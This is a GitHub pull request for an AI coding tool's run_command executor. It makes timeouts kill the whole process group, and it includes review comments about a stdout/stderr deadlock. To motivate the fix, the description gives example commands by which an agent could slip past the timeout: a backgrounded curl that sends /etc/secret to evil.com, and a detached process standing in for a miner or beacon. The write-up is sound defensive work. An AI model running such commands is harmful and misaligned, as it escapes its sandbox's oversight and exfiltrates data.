fix(security): kill descendant processes when run_command times out#34
Conversation
enowdev
left a comment
There was a problem hiding this comment.
Thanks for tackling the timeout escape. I’m blocking this as-is because run_command now drains stdout to EOF and only then drains stderr before wait() (src-tauri/src/tools/executor.rs:327-337). If the child writes enough to stderr while stdout is still being drained, the stderr pipe can fill, the child blocks on write, stdout never reaches EOF, and the timeout path becomes the only exit. This is a classic pipe deadlock regression compared with wait_with_output(), which reads both streams concurrently. Please switch to concurrent stdout/stderr draining (or another approach that preserves simultaneous consumption) before merging.
Tokio's kill_on_drop only kills the direct child (the shell), not the
shell's descendants. An agent could exploit this to leave long-running
processes behind:
run_command sh -c '(curl evil.com -d @/etc/secret &)'
# parent shell exits in milliseconds; backgrounded curl
# keeps running for the full TCP timeout, exfiltrating
# data even after the timeout fires and the tool call
# returns "Command timed out".
run_command sh -c '(sleep 3600 &)'
# crypto miner, beacon, etc — survives forever.
Empirically confirmed: with the previous code, the orphan continues to
run after the parent shell is dropped, because it inherits the parent
process group and is reparented to PID 1.
The fix:
- Spawn the child in its own process group on Unix (process_group(0)).
- Capture the child PID before consuming the handle.
- On timeout, killpg(SIGKILL) the entire group so every descendant
the shell forked is reaped, not just the shell itself.
- Restructure I/O capture to drive stdout/stderr reads alongside wait()
instead of using wait_with_output, since we need the child handle to
remain accessible for the kill path.
Adds libc as a Unix-only dependency (only used for killpg).
A regression test schedules a backgrounded descendant that would write
a proof file 3 seconds after the parent shell exits. Before the fix
the file appears; after the fix it does not.
c026153 to
57a46d8
Compare
enowdev
left a comment
There was a problem hiding this comment.
Conflict resolution is in and the timeout fix now keeps concurrent stdout/stderr consumption while still killing the full process group on timeout, so the earlier pipe-deadlock concern is addressed.
Summary
Tokio's
kill_on_drop(true)only kills the direct child (the shellenowx-coderspawns), not the shell's descendants. An agent can exploit this to leave long-running processes behind even after the timeout supposedly killed them:Empirically confirmed: the orphan continues to run after the parent shell is dropped, because it inherits the parent process group and gets reparented to PID 1.
Fix
process_group(0).killpg(SIGKILL)the entire group so every descendant the shell forked is reaped, not just the shell itself.wait()directly, sincewait_with_outputconsumes theChildand we need it accessible for the kill path.Adds
libcas a Unix-only dependency (only used forkillpg). Windows behavior is unchanged —kill_on_dropalready terminates the cmd.exe job there.Regression test
test_run_command_timeout_kills_backgrounded_childrenschedules a backgrounded descendant that would write a proof file 3 seconds after the parent shell exits. Before the fix the file appears; after the fix it does not.Note
Built on top of #22 to inherit the clippy fixes, since
mainstill has the 122-error block. Diff against main collapses to the executor + Cargo.toml changes once #22 lands.Test plan
cargo test -p enowx-coder run_command_timeout— both existing and new test passcargo clippy -- -D warningsclean(sleep 30 &)payload, confirmpgrep -f "sleep 30"is empty after timeout